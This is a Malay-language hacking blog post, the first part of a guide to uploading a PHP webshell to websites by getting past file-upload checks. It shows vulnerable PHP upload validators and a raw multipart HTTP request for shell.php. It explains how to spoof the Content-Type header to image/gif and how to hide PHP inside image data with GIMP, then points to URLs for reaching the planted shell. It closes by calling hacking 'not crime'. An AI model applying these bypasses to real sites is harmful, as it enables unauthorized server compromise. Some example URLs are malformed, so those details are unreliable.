CARA NAK UPLOAD WEBSHELL BYPASS SECURITY PART 1




 

Aku terangkan cara untuk bypass untuk upload shell.
korang da dapat bukak website yg ade tempat untuk upload dokumen atau gambar.

code di bawah code asas untuk upload file HTML.

<form name=upload action=upload.php method=post>
   upload a file : <input type=file name=fileName >
   <input type=submit name=upload>
</form>


dari sini boleh upload teros shell.


Content type verification
selalu nye yang jenis nie dalam upload.php utk upload file teks biase dan php x akan upload.


       <?php
      //checks if file is Gif or not 
       if($_FILES['userfile']['type'] != "image/gif")  
       {
          echo "Sorry, we only allow uploading GIF images";
          exit;
       }
      $uploaddir = 'uploads/';
      $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
      if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) 
   {
          echo "File is valid, and was successfully uploaded.n";
   } 
   else
    {
          echo "File uploading failed.n";
    }
   ?>


code kat atas utk cek file sama ade gif atau tak



"
   POST /upload2.php HTTP/1.1
   TE: deflate,gzip;q=0.3
   Connection: TE, close
   Host: localhost
   User-Agent: libwww-perl/5.803
   Content-Type: multipart/form-data; boundary=xYzZY
   Content-Length: 156
   --xYzZY
   Content-Disposition: form-data; name="userfile"; filename="shell.php"
   Content-Type: text/plain 

"

code akan cek file. kalau bukan gif file tak akan di upload.

Sekarang kte boleh bypass protection dgn gunakan program
spt Perl atau form data temper plugin di firefox.

contoh :
"Content-Type" => "Image/Gif"
ni akan buat file upload dan korang boleh access dengan

http://www.contoh.com/uploads/shell.php

IMAGE CONTECT VERIFICATION
jenis nie, ia akan kandungan file yg di upload mempunyai script atau tak.

code :


<?php
 $imageinfo = getimagesize($_FILES['userfile']['tmp_name']); //check image size
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') 
{
    echo "Sorry, we only accept GIF and JPEG imagesn";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.n";
} else {
    echo "File uploading failed.n";
}
?>




code di atas fungsi php GetImageSize kembalikan size dan image

Sekarang cara bypass jenis nie korang boleh gunakan program seperti
GIMP utk tanam script php dalam data imej file binary.
bila upload korang tengok file image tu mmg image yg sah tapi jurubahasa php nampak
file dalam tu ade script php.
oleh itu walaupun kte extension shell untuk php dan bile proses file name verification xde.
file akan upload sbg GI atau image.

contoh :
http://www.contoh.com.upload.shell.gif
akan tunjukkan file image yg btol (walaupun ade shell di tanam dalam data image)

dan
http://www.contoh.com/upload/shell.php
akan keluar shell  (di upload sbg file php shj)

sampai sini dulu.. bersambung kemudian..
hacking is not crime..
hahaha
thumbnail
About The Author

[ EXPLORING KNOWN AND THE UNKNOWN ]

Related Posts

0 comments